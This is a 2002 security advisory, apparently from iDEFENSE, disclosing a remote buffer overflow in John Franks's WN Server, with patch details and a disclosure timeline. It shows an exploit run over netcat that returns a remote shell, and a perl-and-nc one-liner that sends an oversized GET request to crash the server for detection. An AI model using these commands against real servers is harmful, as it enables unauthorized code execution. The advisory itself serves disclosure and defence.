Public Vulnerability Reports

Buffer overflow in WN Server

09.30.02

BACKGROUND

John Franks's WN Server is an HTTP server designed to provide functionality usually available only with complex CGI programs without the necessity of writing or using these programs. It is included in the latest FreeBSD ports collection. More information about it is available at http://hopf.math.nwu.edu/.

DESCRIPTION

Remote exploitation of a buffer overflow in WN Server could allow arbitrary code execution under the privileges of the targeted server. Exploitation is possible by issuing WN Server a long GET request. Customized shell code is required to bypass the character filtering that WN Server imposes on the requested URI.

ANALYSIS

The following is a snapshot of an exploit at work:

$ (./wn_bof 0 3; cat) | nc target 80
Trying ret=0xbfbeb4ec
$ id
uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
$ uname
FreeBSD

Exploitation of a buffer overflow usually results in one of two things: the targeted host process/application/host crashes, or arbitrary code executes. Both have serious repercussions, but in most cases, code execution is more threatening in that it could allow for the further usurpation of higher-level privileges on the targeted host.

DETECTION

WN Server 1.18.2 through 2.0.0, which are included in the FreeBSD ports collection, are affected. Do the following to determine whether a specific WN implementation is susceptible:

1. Ensure that WN is running and open two terminals.
2. In the first terminal execute the command "perl -e 'print "GET /"
. "a"x1600';cat)|nc localhost 80"
3. In the second terminal, determine the process ID of the child
that was spawned to handle the previous command, and attach
GDB to it via the following command set:
# ps ax | grep swn
4223 ?? Ss 0:00.29 ./swn
4711 ?? S 0:00.01 ./swn
# gdb ./swn 4711
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
...
4. In the second terminal, type 'c'. This tells GDB to continue.
5. In the first terminal, press 'enter'. If at this point the following
output is returned from GDB, then a vulnerable WN
implementation is running:
Program received signal SIGSEGV, Segmentation fault.
0x61616161 in ?? ()

WORKAROUND

No workaround is available as of this writing.

VENDOR RESPONSE

John Franks released WN Server 2.4.4, which corrects this problem. It is available at http://hopf.math.nwu.edu/wn-2.4.4.tar.gz.

CVE INFORMATION

The Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project assigned the identification number CAN-2002-1166 for this issue.

DISCLOSURE TIMELINE

08/29/2002 Issue disclosed to iDEFENSE
09/24/2002 John Franks notified via e-mail to john@math.northwestern.edu
09/24/2002 iDEFENSE clients notified
09/24/2002 Vendor response received
09/30/2002 Issue disclosed to public

CREDIT

badc0ded (badc0ded@badc0ded.com) is credited with discovering this vulnerability.